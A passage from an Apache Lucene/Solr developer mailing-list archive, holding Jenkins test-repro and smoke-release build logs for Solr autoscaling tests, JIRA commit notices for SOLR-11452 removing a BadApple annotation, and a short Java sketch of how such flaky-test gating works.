-Dtests.timezone=Asia/Hovd -Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[repro] Repro line:  ant test  -Dtestcase=AutoScalingHandlerTest 
-Dtests.method=testReadApi -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=en-ZA 
-Dtests.timezone=America/Edmonton -Dtests.asserts=true 
-Dtests.file.encoding=ISO-8859-1

[repro] Repro line:  ant test  -Dtestcase=CollectionsAPIDistributedZkTest 
-Dtests.method=deletePartiallyCreatedCollection -Dtests.seed=63B30E99B809974F 
-Dtests.multiplier=2 -Dtests.slow=true -Dtests.badapples=true 
-Dtests.locale=en-NZ -Dtests.timezone=America/Cuiaba -Dtests.asserts=true 
-Dtests.file.encoding=ISO-8859-1

[repro] Repro line:  ant test  -Dtestcase=SearchRateTriggerTest 
-Dtests.method=testTrigger -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=es -Dtests.timezone=PRC 
-Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[repro] git rev-parse --abbrev-ref HEAD
[repro] git rev-parse HEAD
[repro] Initial local git branch/revision: 
4603541d1856e889fcd76bf409dcdb4664419518
[repro] git fetch
[repro] git checkout 1e661ed97aed0cc77869b01134d80c761c6b5295

[...truncated 2 lines...]
[repro] git merge --ff-only

[...truncated 1 lines...]
[repro] ant clean

[...truncated 6 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   AutoScalingHandlerTest
[repro]   ScheduledMaintenanceTriggerTest
[repro]   SearchRateTriggerTest
[repro]   CollectionsAPIDistributedZkTest
[repro] ant compile-test

[...truncated 3316 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=20 
-Dtests.class="*.AutoScalingHandlerTest|*.ScheduledMaintenanceTriggerTest|*.SearchRateTriggerTest|*.CollectionsAPIDistributedZkTest"
 -Dtests.showOutput=onerror  -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=en-ZA 
-Dtests.timezone=America/Edmonton -Dtests.asserts=true 
-Dtests.file.encoding=ISO-8859-1

[...truncated 9493 lines...]
[repro] Setting last failure code to 256

[repro] Failures:
[repro]   0/5 failed: 
org.apache.solr.cloud.api.collections.CollectionsAPIDistributedZkTest
[repro]   0/5 failed: org.apache.solr.cloud.autoscaling.AutoScalingHandlerTest
[repro]   5/5 failed: 
org.apache.solr.cloud.autoscaling.ScheduledMaintenanceTriggerTest
[repro]   5/5 failed: org.apache.solr.cloud.autoscaling.SearchRateTriggerTest

[repro] Re-testing 100% failures at the tip of branch_7x
[repro] ant clean

[...truncated 8 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   ScheduledMaintenanceTriggerTest
[repro]   SearchRateTriggerTest
[repro] ant compile-test

[...truncated 3316 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=10 
-Dtests.class="*.ScheduledMaintenanceTriggerTest|*.SearchRateTriggerTest" 
-Dtests.showOutput=onerror  -Dtests.seed=63B30E99B809974F -Dtests.multiplier=2 
-Dtests.slow=true -Dtests.badapples=true -Dtests.locale=it 
-Dtests.timezone=Asia/Hovd -Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[...truncated 9298 lines...]
[repro] Setting last failure code to 256

[repro] Failures at the tip of branch_7x:
[repro]   5/5 failed: 
org.apache.solr.cloud.autoscaling.ScheduledMaintenanceTriggerTest
[repro]   5/5 failed: org.apache.solr.cloud.autoscaling.SearchRateTriggerTest

[repro] Re-testing 100% failures at the tip of branch_7x without a seed
[repro] ant clean

[...truncated 8 lines...]
[repro] Test suites by module:
[repro]solr/core
[repro]   ScheduledMaintenanceTriggerTest
[repro]   SearchRateTriggerTest
[repro] ant compile-test

[...truncated 3316 lines...]
[repro] ant test-nocompile -Dtests.dups=5 -Dtests.maxfailures=10 
-Dtests.class="*.ScheduledMaintenanceTriggerTest|*.SearchRateTriggerTest" 
-Dtests.showOutput=onerror  -Dtests.multiplier=2 -Dtests.slow=true 
-Dtests.badapples=true -Dtests.locale=it -Dtests.timezone=Asia/Hovd 
-Dtests.asserts=true -Dtests.file.encoding=ISO-8859-1

[...truncated 8645 lines...]
[repro] Setting last failure code to 256

[repro] Failures at the tip of branch_7x without a seed:
[repro]   3/5 failed: 
org.apache.solr.cloud.autoscaling.ScheduledMaintenanceTriggerTest
[repro]   5/5 failed: org.apache.solr.cloud.autoscaling.SearchRateTriggerTest
[repro] git checkout 4603541d1856e889fcd76bf409dcdb4664419518

[...truncated 2 lines...]
[repro] Exiting with code 256

[...truncated 6 lines...]

-

[JENKINS] Lucene-Solr-SmokeRelease-7.x - Build # 222 - Still Failing

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-SmokeRelease-7.x/222/

No tests ran.

Build Log:
[...truncated 24218 lines...]
[asciidoctor:convert] asciidoctor: ERROR: about-this-guide.adoc: line 1: 
invalid part, must have at least one section (e.g., chapter, appendix, etc.)
[asciidoctor:convert] asciidoctor: ERROR: solr-glossary.adoc: line 1: invalid 
part, must have at least one section (e.g., chapter, appendix, etc.)
 [java] Processed 2195 links (1751 relative) to 2950 anchors in 228 files
 [echo] Validated Links & Anchors via: 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/build/solr-ref-guide/bare-bones-html/

-dist-changes:
 [copy] Copying 4 files to 
/home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/package/changes

-dist-keys:
  [get] Getting: http://home.apache.org/keys/group/lucene.asc
  [get] To: /home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/package/KEYS

package:

-unpack-solr-tgz:

-ensure-solr-tgz-exists:
[mkdir] Created dir: /home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/build/solr.tgz.unpacked
[untar] Expanding: /home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/package/solr-7.4.0.tgz into /home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/solr/build/solr.tgz.unpacked

generate-maven-artifacts:

resolve:

resolve:

ivy-availability-check:
[loadresource] Do not set property disallowed.ivy.jars.list as its length is 0.

-ivy-fail-disallowed-ivy-version:

ivy-fail:

ivy-configure:
[ivy:configure] :: loading settings :: file = /home/jenkins/jenkins-slave/workspace/Lucene-Solr-SmokeRelease-7.x/lucene/top-level-ivy-settings.xml


[jira] [Commented] (SOLR-11452) TestTlogReplica.testOnlyLeaderIndexes() failure

2018-05-21 Thread ASF subversion and git services (JIRA)

[ https://issues.apache.org/jira/browse/SOLR-11452?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482284#comment-16482284 ]

ASF subversion and git services commented on SOLR-11452:


Commit 4603541d1856e889fcd76bf409dcdb4664419518 in lucene-solr's branch refs/heads/master from [~caomanhdat]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=4603541 ]

SOLR-11452: Remove BadApple annotation
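For context, the annotation being removed here gates flaky ("bad apple") tests: an annotated test is skipped unless the run passes -Dtests.badapples=true, which is why these suites only fail on the BadApples Jenkins jobs. A minimal self-contained sketch of that gating idea follows; the annotation and classes below are illustrative stand-ins, not the actual Lucene test-framework types.

```java
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;

public class BadAppleDemo {

    // Stand-in for the test framework's flaky-test marker.
    @Retention(RetentionPolicy.RUNTIME)
    @interface BadApple {
        String bugUrl() default "";
    }

    // A flaky test would carry the annotation, pointing at its JIRA issue.
    static class SomeTest {
        @BadApple(bugUrl = "https://issues.apache.org/jira/browse/SOLR-11452")
        void testOnlyLeaderIndexes() { /* flaky test body */ }
    }

    /** A test runs unless it is marked BadApple and badapples is disabled. */
    static boolean shouldRun(boolean annotatedBadApple, boolean badApplesEnabled) {
        return !annotatedBadApple || badApplesEnabled;
    }

    public static void main(String[] args) throws Exception {
        // Detect the annotation reflectively, as a runner would.
        boolean annotated = SomeTest.class
                .getDeclaredMethod("testOnlyLeaderIndexes")
                .isAnnotationPresent(BadApple.class);
        // Mirrors passing -Dtests.badapples=true on the command line.
        boolean enabled = Boolean.getBoolean("tests.badapples");
        System.out.println("runs: " + shouldRun(annotated, enabled));
    }
}
```

Removing the annotation, as this commit does, promotes the test back into every run instead of only the badapples-enabled jobs.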


> TestTlogReplica.testOnlyLeaderIndexes() failure
> ---
>
> Key: SOLR-11452
> URL: https://issues.apache.org/jira/browse/SOLR-11452
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Steve Rowe
>Assignee: Cao Manh Dat
>Priority: Major
> Fix For: 7.2, master (8.0)
>
>
> Reproduces for me, from 
> [https://builds.apache.org/job/Lucene-Solr-NightlyTests-master/1398]:
> {noformat}
> Checking out Revision f0a4b2dafe13e2b372e33ce13d552f169187a44e 
> (refs/remotes/origin/master)
> [...]
>[junit4]   2> NOTE: reproduce with: ant test  -Dtestcase=TestTlogReplica 
> -Dtests.method=testOnlyLeaderIndexes -Dtests.seed=CCAC87827208491B 
> -Dtests.multiplier=2 -Dtests.nightly=true -Dtests.slow=true 
> -Dtests.linedocsfile=/home/jenkins/jenkins-slave/workspace/Lucene-Solr-NightlyTests-master/test-data/enwiki.random.lines.txt
>  -Dtests.locale=el -Dtests.timezone=Australia/LHI -Dtests.asserts=true 
> -Dtests.file.encoding=ISO-8859-1
>[junit4] FAILURE 29.5s J2 | TestTlogReplica.testOnlyLeaderIndexes <<<
>[junit4]> Throwable #1: java.lang.AssertionError: expected:<2> but 
> was:<5>
>[junit4]>  at 
> __randomizedtesting.SeedInfo.seed([CCAC87827208491B:D0ADFA0F07AD3788]:0)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.assertCopyOverOldUpdates(TestTlogReplica.java:909)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.testOnlyLeaderIndexes(TestTlogReplica.java:501)
>[junit4]>  at java.lang.Thread.run(Thread.java:748)
> [...]
>[junit4]   2> NOTE: test params are: codec=CheapBastard, 
> sim=RandomSimilarity(queryNorm=false): {}, locale=el, timezone=Australia/LHI
>[junit4]   2> NOTE: Linux 3.13.0-88-generic amd64/Oracle Corporation 
> 1.8.0_144 (64-bit)/cpus=4,threads=1,free=137513712,total=520093696
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-11452) TestTlogReplica.testOnlyLeaderIndexes() failure

2018-05-21 Thread ASF subversion and git services (JIRA)

[ https://issues.apache.org/jira/browse/SOLR-11452?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482283#comment-16482283 ]

ASF subversion and git services commented on SOLR-11452:


Commit 6bb2cc2acd9822861b304478637297d2b1d718bd in lucene-solr's branch refs/heads/branch_7x from [~caomanhdat]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=6bb2cc2 ]

SOLR-11452: Remove BadApple annotation


> TestTlogReplica.testOnlyLeaderIndexes() failure
> ---
>
> Key: SOLR-11452
> URL: https://issues.apache.org/jira/browse/SOLR-11452
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Steve Rowe
>Assignee: Cao Manh Dat
>Priority: Major
> Fix For: 7.2, master (8.0)
>
>
> Reproduces for me, from 
> [https://builds.apache.org/job/Lucene-Solr-NightlyTests-master/1398]:
> {noformat}
> Checking out Revision f0a4b2dafe13e2b372e33ce13d552f169187a44e 
> (refs/remotes/origin/master)
> [...]
>[junit4]   2> NOTE: reproduce with: ant test  -Dtestcase=TestTlogReplica 
> -Dtests.method=testOnlyLeaderIndexes -Dtests.seed=CCAC87827208491B 
> -Dtests.multiplier=2 -Dtests.nightly=true -Dtests.slow=true 
> -Dtests.linedocsfile=/home/jenkins/jenkins-slave/workspace/Lucene-Solr-NightlyTests-master/test-data/enwiki.random.lines.txt
>  -Dtests.locale=el -Dtests.timezone=Australia/LHI -Dtests.asserts=true 
> -Dtests.file.encoding=ISO-8859-1
>[junit4] FAILURE 29.5s J2 | TestTlogReplica.testOnlyLeaderIndexes <<<
>[junit4]> Throwable #1: java.lang.AssertionError: expected:<2> but 
> was:<5>
>[junit4]>  at 
> __randomizedtesting.SeedInfo.seed([CCAC87827208491B:D0ADFA0F07AD3788]:0)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.assertCopyOverOldUpdates(TestTlogReplica.java:909)
>[junit4]>  at 
> org.apache.solr.cloud.TestTlogReplica.testOnlyLeaderIndexes(TestTlogReplica.java:501)
>[junit4]>  at java.lang.Thread.run(Thread.java:748)
> [...]
>[junit4]   2> NOTE: test params are: codec=CheapBastard, 
> sim=RandomSimilarity(queryNorm=false): {}, locale=el, timezone=Australia/LHI
>[junit4]   2> NOTE: Linux 3.13.0-88-generic amd64/Oracle Corporation 
> 1.8.0_144 (64-bit)/cpus=4,threads=1,free=137513712,total=520093696
> {noformat}


